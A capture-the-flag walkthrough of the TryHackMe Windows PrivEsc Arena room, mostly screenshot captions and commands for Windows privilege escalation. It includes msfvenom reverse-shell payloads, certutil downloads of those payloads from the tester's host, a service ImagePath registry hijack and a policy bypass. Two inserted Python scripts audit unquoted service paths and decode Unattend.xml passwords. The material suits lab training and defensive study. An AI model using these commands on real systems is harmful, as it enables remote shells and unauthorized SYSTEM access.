Tryhackme - Windows PrivEsc Arena

In this walkthrough, we will be going through the Windows PrivEsc Arena room from Tryhackme. This room is rated as Medium on the platform and teaches students about Windows privilege escalation techniques using a vulnerable Windows VM. So, let’s get started without any delay.

Windows PrivEsc Arena

Task 1 – Connecting to TryHackMe network

Task 2 – Deploy the vulnerable machine

Question 1 – Deploy the machine and log into the user account via RDP

RDP login

RDP into machine

Question 2 – Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

cmd.exe

Task 3 – Registry Escalation – Autorun

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Autoruns

accesschk64.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe

generate program.exe

use multi handler

certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe program.exe

download program.exe

  • Unable to write to the Autorun program folder as it requires Admin rights to write to it. However, as per the accesschk output, Everyone had Read and Write access, but I was unable to replicate that in the lab for some reason.

Task 4 – Registry Escalation – AlwaysInstallElevated

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Registry Policies

generate setup.msi

certutil.exe -urlcache -f http://10.18.1.78:8000/setup.msi setup.msi

setup.msi download

NT authority system

Task 5 – Service Escalation – Registry

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

powershell -ep bypass

certutil.exe -urlcache -f http://10.18.1.78:8000/program.exe shell.exe

shell.exe

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

net start regsvc

shell.exe

NT authority system

Task 6 – Service Escalation – Executable Files

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

File permission service

filepermservice.exe

NT authority system

Task 7 – Privilege Escalation – Startup Applications

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

icacls.exe

copy shell.exe

RDP login

TCM-PC\TCM

Task 8 – Service Escalation – DLL Hijacking

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

Process Monitor filter

net start dllsvc

Create File

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444  -f dll -o hijackme.dll

hijackme.dll

certutil.exe -urlcache -f http://10.18.1.78:8000/hijackme.dll hijackme.dll

hijackme.dll

net stop dllsvc & net start dllsvc

net stop dllsvc

  • I was unable to get a reverse shell back. I didn’t try the route the walkthrough intends, but it should be worth a try.

Task 9 – Service Escalation – binPath

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

accesschk64.exe

start daclsvc

Task 10 – Service Escalation – Unquoted Service Paths

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

unquotedsvc

common.exe

sc start

NT authority system
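The unquoted-path condition from Task 10 is easy to audit once the ImagePath strings are in hand. The following Python audit is an added example, not the room's or the author's tooling: it takes constructed ImagePath values (made up here, not output from the room's VM; on a real host they would be read from each service's ImagePath registry value or from "sc qc"), flags binaries whose own path contains a space but is not quoted, lists the parent directories whose ACLs must deny write access to standard users, and produces the remediated, quoted value. The extension-based split between binary and arguments is a heuristic, and the edge case of spaces that appear only in the arguments is handled as not vulnerable.

```python
import re

# Constructed sample ImagePath values for the audit below. These are made-up
# entries, not output taken from the room's VM; on a real host they would come
# from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath or "sc qc <name>".
SAMPLE_SERVICES = {
    "unquotedsvc": r"C:\Program Files\Unquoted Path Service\Common Files\service.exe",
    "goodsvc": r'"C:\Program Files\Good Service\good.exe" -k netsvcs',
    "sysdrv": r"\SystemRoot\System32\drivers\example.sys",
    "win32svc": r"C:\Windows\System32\svchost.exe -k LocalService",
    "spaceargs": r"C:\tools\agent.exe --config C:\ProgramData\agent config.json",
}

# Heuristic: the executable part ends at the first recognised binary extension;
# anything after it is treated as arguments.
_EXE_RE = re.compile(r"^(.*?\.(?:exe|sys|dll|bat|cmd))(\s.*)?$", re.IGNORECASE)


def parse_image_path(image_path):
    """Return (executable, arguments, was_quoted) for a service ImagePath."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:  # unbalanced quote: take the rest as the executable
            return s[1:], "", True
        return s[1:end], s[end + 1:].strip(), True
    m = _EXE_RE.match(s)
    if m:
        return m.group(1), (m.group(2) or "").strip(), False
    return s, "", False  # no recognisable extension: whole string is the binary


def is_unquoted_with_spaces(image_path):
    """True when the binary path itself (not its arguments) contains a space
    and is not wrapped in quotes, i.e. the misconfiguration from Task 10."""
    exe, _args, quoted = parse_image_path(image_path)
    return not quoted and " " in exe


def directories_to_check(image_path):
    """Parent directories Windows consults before reaching the intended
    binary. Each of them must deny write/create access to standard users."""
    exe, _args, quoted = parse_image_path(image_path)
    if quoted or " " not in exe:
        return []
    dirs = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            parent = prefix.rsplit("\\", 1)[0] + "\\"
            if parent not in dirs:
                dirs.append(parent)
    return dirs


def quote_image_path(image_path):
    """Remediated value: binary wrapped in double quotes, arguments preserved."""
    exe, args, _quoted = parse_image_path(image_path)
    return '"%s"%s' % (exe, " " + args if args else "")


def audit_services(services):
    """services: name -> ImagePath. Returns the names that need fixing."""
    return [name for name, path in services.items() if is_unquoted_with_spaces(path)]


if __name__ == "__main__":
    for name in audit_services(SAMPLE_SERVICES):
        print(name, "->", quote_image_path(SAMPLE_SERVICES[name]))
        for d in directories_to_check(SAMPLE_SERVICES[name]):
            print("   verify ACL on", d)
```

Writing the quoted value back (for example with "sc config <name> binPath= ..." as an administrator) closes the issue; checking the listed directories with icacls confirms that no standard user can create files in them in the meantime.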

Task 11 – Potato Escalation – Hot Potato

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

powershell -ep bypass

net localgroup administrators

Task 12 – Password Mining Escalation – Configuration Files

Question 1 – What is the cleartext password found in Unattend.xml?

Unattend.xml

base64 decode
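The base64 step in Task 12 can be turned into a repeatable check for leftover imaging credentials. The Python below is an added example, not the room's file or the author's method: it builds a constructed Unattend.xml (made up here, with a made-up password) containing one encoded AutoLogon password and one plain-text AdministratorPassword, then walks every password element, honours the PlainText flag, decodes base64 values in either UTF-16LE (what Windows System Image Manager writes) or plain UTF-8 (common in hand-edited files), and strips the "Password" suffix that the encoder appends. Treating a missing PlainText element as false is an assumption of this example.

```python
import base64
import xml.etree.ElementTree as ET


def _encode_unattend(password):
    # Windows System Image Manager stores base64(UTF-16LE(password + "Password")).
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


# Constructed sample (not the room's file): one encoded AutoLogon password and
# one plain-text local Administrator password left behind after imaging.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>%s</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Plain-Sample-1</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""" % _encode_unattend("S4mple!Pass")


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_value(value, plain_text):
    """Recover the cleartext from a <Value> element."""
    if plain_text:
        return value
    raw = base64.b64decode(value)
    # WSIM writes UTF-16LE (every second byte is NUL for ASCII input);
    # hand-edited files are often plain ASCII/UTF-8.
    if len(raw) >= 2 and raw[1] == 0:
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8")
    # The "Password" suffix is added at encode time and is not part of the secret.
    if text.endswith("Password"):
        text = text[: -len("Password")]
    return text


def find_unattend_credentials(xml_text):
    """Return one finding per password element in an unattend/sysprep file."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) not in ("Password", "AdministratorPassword"):
            continue
        value, plain = None, False  # assumption: PlainText defaults to false
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plain = (child.text or "").strip().lower() == "true"
        if value:
            findings.append({
                "element": _local(elem.tag),
                "plain_text": plain,
                "password": decode_unattend_value(value, plain),
            })
    return findings


if __name__ == "__main__":
    # Report presence and length only; the cleartext stays out of logs.
    for f in find_unattend_credentials(SAMPLE_UNATTEND):
        print("%s (PlainText=%s): credential of length %d present; remove the file"
              % (f["element"], f["plain_text"], len(f["password"])))
```

Run against the real locations (C:\Windows\Panther, C:\Windows\Panther\Unattend and C:\Windows\System32\Sysprep are the usual ones), a non-empty result means the image left a credential on disk: the file should be deleted after deployment and the account's password rotated.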

Task 13 – Password Mining Escalation – Memory

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

HTTP basic auxiliary module

iexplore.exe

Windows Task Manager

Dumping Process

password

Task 14 – Privilege Escalation – Kernel Exploits

Question 1 – Click ‘Completed’ once you have successfully elevated the machine

generate payload with msfvenom

use multi handler

Local exploit suggester

MS16_014_wmi exploit

So that was “Windows PrivEsc Arena” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we have landed on a Windows machine. Well, the best thing on any machine is to be admin or NT AUTHORITY\SYSTEM, and today we have learned how we can get to that point. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
